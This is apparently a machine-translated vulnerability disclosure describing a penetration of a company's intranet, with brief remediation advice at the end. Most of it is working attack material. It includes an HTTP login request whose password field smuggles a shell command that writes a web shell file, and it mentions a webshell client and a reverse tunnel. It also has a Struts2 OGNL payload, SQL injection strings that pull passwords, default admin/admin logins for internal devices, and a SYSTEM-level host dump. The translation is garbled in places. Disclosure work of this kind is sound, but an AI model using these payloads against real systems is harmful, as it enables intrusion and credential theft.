9 Yang Intranet roaming caused by a Vulnerability (password needs to be filtered)
Fix
Reference:
Http://wooyun.org/bugs/wooyun-2010-0141195 based on previous Vulnerabilities
The account has been filtered out. The password is still not filtered out.
POST /ease/App/index.php/Public/dologin HTTP/1.1Host: plmyun.joyoung.comConnection: keep-aliveContent-Length: 108Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: https://plmyun.joyoung.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0Content-Type: application/x-www-form-urlencodedReferer: https://plmyun.joyoung.com/ease/App/index.php/Public/loginAccept-Encoding: gzip,deflateAccept-Language: zh-CN,zh;q=0.8Cookie: PHPSESSID=gbm15fsjqg8gc7s6ovtdm2uqo6account=123&password=123%22%26echo '' > /var/www/cgi-bin/yo.php%26ifconfig%22&wdsl=adw&__hash__=c800b1c5f9c095e463c5fc8c1e4de4d3_15b9ecc9113266ac29e34a08bf0b87b5
You can use the new version of the kitchen knife to support the old version of https NO
Tunnel http reverse tunnel
First access some internal systems
#1
Mask Region
1.http://**.**.**
/Systeminfo? Vendor = CITRIX & licenseTab = & selected =
Admin/admin weak password for virtualization Management
#2
Https: // 172.31.1.120/appliance-overview.php
Admin/admin
AVOCENT KVM
Product Features
The MergePoint Unity switch integrates KVM over IP and serial console management technology on a single device. This independence
IT administrators can access and control servers, network devices, and other data centers and branch offices.
Complete remote management of devices
#3
Target:
Mask Region
1.http://**.**.**/
ExecuteSQLFileAction. action
Whoami: nt authority \ system
WebPath: C: \ tomcat \ defalut \ webapps \ ROOT
OS. Name: Windows 2003
OS. Version: 5.2
Java. Home: C: \ Program Files \ Java \ jdk1.6.0 _ 17 \ jre
Java. Version: 1.6.0 _ 17
OS. arch: x86
User. Name: SYSTEM
User. Home: C: \ Documents ents and Settings \ Default User
User. Dir: C: \ WINDOWS \ system32
Java. Class. Path: C: \ tomcat \ defalut \ bin \ bootstrap. jar
Java. IO. Tmpdir: C: \ tomcat \ defalut \ temp
#4
Mask Region
1.http://**.**.**
/Jy_admin/security! Login. action? Redirect % 3A % 24% 7B % 23req % 3D
% 23context. get % 28% 27com. opensymphony. xwork2.dispatcher. HttpServletRequest
% 27% 29% 2C % 23a % 3D % 23req. getSession % 28% 29% 2C % 23b % 3D % 23a. getServletContext
% 28% 29% 2C % 23c % 3D % 23b. getRealPath % 28% 2F % 22% 22% 2C % 23 matt % 3D % 23context. get
% 28% 27com. opensymphony. xwork2.dispatcher. HttpServletResponse % 27% 29% 2C
% 23matt. getWriter % 28% 29. println % 28% 23c % 29% 2C % 23matt. getWriter % 28% 29. flush
% 28% 29% 2C % 23matt. getWriter % 28% 29. close % 28% 29% 7D
#5
Mask Region
1.http://**.**.**
/Default. aspx O & M Information Platform
1 'or '1' = '1 Injection
123456
http://172.31.0.111/Web/Users/login.asp' and 1=convert(int,(select top 1 Password from Users)) -- 'or'1'='1 09126970585
Solution:
1. Fix command execution at the entrance
2. Fixing common intranet vulnerabilities. SQL Injection struts Command Execution
3. Various device default passwords